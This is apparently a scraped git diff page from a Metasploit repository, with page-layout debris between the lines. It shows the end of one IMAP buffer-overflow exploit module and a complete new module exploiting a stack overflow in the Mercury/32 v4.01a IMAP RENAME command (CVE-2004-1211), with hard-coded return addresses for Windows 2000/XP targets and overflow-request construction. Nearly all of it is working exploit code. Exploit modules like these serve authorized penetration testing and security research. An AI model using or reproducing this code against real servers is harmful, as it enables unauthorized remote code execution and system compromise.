res = sock.get_once
|
||||||
|
|
||||||
|
|
||||||
|
print_status("Received CRAM-MD5 answer: #{res.chomp}")
|
||||||
|
# Magic no return-address exploitation ninjaness!
|
||||||
|
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
|
||||||
|
req = Rex::Text.encode_base64(buf) + "\r\n"
|
||||||
|
sock.put(req)
|
||||||
|
res = sock.get_once
|
||||||
|
|
||||||
|
print_status("Received authentication reply: #{res.chomp}")
|
||||||
|
print_status("Sending LOGOUT to close the thread and trigger an exception")
|
||||||
|
sock.put("a002 LOGOUT\r\n")
|
||||||
|
res = sock.get_once
|
||||||
|
|
||||||
|
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||||
|
select(nil, nil, nil, 1)
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,71 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Windows::Imap::MercuryIMAPRenameOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Imap
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a stack overflow vulnerability in the
|
||||||
|
Mercury/32 v.4.01a IMAP service.
|
||||||
|
},
|
||||||
|
'Author' => [ 'MC' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2004-1211'],
|
||||||
|
[ 'BID', '11775'],
|
||||||
|
[ 'NSS', '15867'],
|
||||||
|
[ 'MIL', '98'],
|
||||||
|
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'process',
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 500,
|
||||||
|
'BadChars' => "\x00\x0a\x0d\x20",
|
||||||
|
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
||||||
|
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['Windows 2000 SP4 English', { 'Ret' => 0x7c2f8498 }],
|
||||||
|
['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }],
|
||||||
|
['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
|
||||||
|
['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Nov 29 2004'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
connect
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
if (banner and banner =~ /Mercury\/32 v4\.01a/)
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect_login
|
||||||
|
|
||||||
|
buf = Pex::Text.rand_text_alpha_upper(260, payload_badchars)
|
||||||
|
req = "a001 RENAME " + buf + [target.ret].pack('V') + payload.encoded + "\r\n"
|
||||||
|
sock.put(req)
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue